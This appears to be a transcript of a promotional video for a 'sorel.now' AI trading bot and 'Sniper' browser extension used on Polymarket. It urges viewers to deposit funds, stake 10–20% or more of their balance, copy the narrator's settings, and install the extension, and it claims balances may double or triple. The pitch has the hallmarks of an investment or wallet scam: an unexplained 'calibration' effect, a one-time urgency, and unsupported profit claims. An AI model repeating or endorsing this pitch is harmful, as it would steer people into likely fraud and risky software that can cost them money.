Hey everyone, today I'm going to review a strategy involving sorel.now that could potentially help you multiply your balance several times over. Let me say this up front. This is a one-time strategy. Running it again on the same account or wallet may produce worse results. You also need to have funds deposited before starting. I wouldn't recommend trying it with less than $50. The bot may not recognize such a small balance as sufficient for operation, while test transactions, fees, and slippage could consume a significant portion of it. I recommend starting with at least $200 to $300. The strategy is based on combining two functions. The AI analyzes a short-term event, estimates its most likely outcome, and when its confidence is high, opens an initial position equal to at least 15% of the total balance. This trade is used to calibrate the system. The extension measures the actual execution speed, slippage, available liquidity, and the appropriate position size. If the prediction is successful, Sniper receives the updated parameters and starts finding and executing suitable trades more quickly. The effect is considered a one-time opportunity because, after the first successful calibration, the system is already configured for the current balance. Activating it again will not provide the same boost. It may sound complicated, but I'll explain everything in simple terms. First, we need to configure the bot for this strategy by placing an initial test trade on a short-term event. I'll be using the BTC up or down 5-minute market. As you can see, the bot has made a prediction. Now we need to place a trade worth at least 15% of the balance. I'm going to place $2,000. The trade is placed. Now we wait. I'll speed this part up. As you can see, the bot handled the first stage perfectly. That's a very good sign. Once we collect our winnings, I'll show you the settings in the dashboard that you should configure exactly as I have. Let's claim the winnings and go to the dashboard. Here, we can see our latest trade. In the top right corner, click Config and apply exactly the same settings that I'm using. Now we can move on to the main strategy, which uses the Sniper function. For anyone who hasn't heard about this extension yet, you can download it from the sorel.now website. Installation only takes a few clicks. I'll leave the link in the description for convenience. Now let's return to Polymarket and select Sniper. Here, I recommend using at least 10% of your balance. However, you shouldn't risk too much either. The optimal range is between 10% and 20%. Let's get started. I'm going to leave the bot running for 24 hours and then check the results. The results exceeded all expectations. However, don't assume that you'll get exactly the same outcome. Everything depends on your balance and the success of the first transaction. My balance doubled, but yours might increase by 1.2 times, or it could potentially triple. Subscribe to the channel and leave a like. I'll be sharing more strategies related to prediction markets here.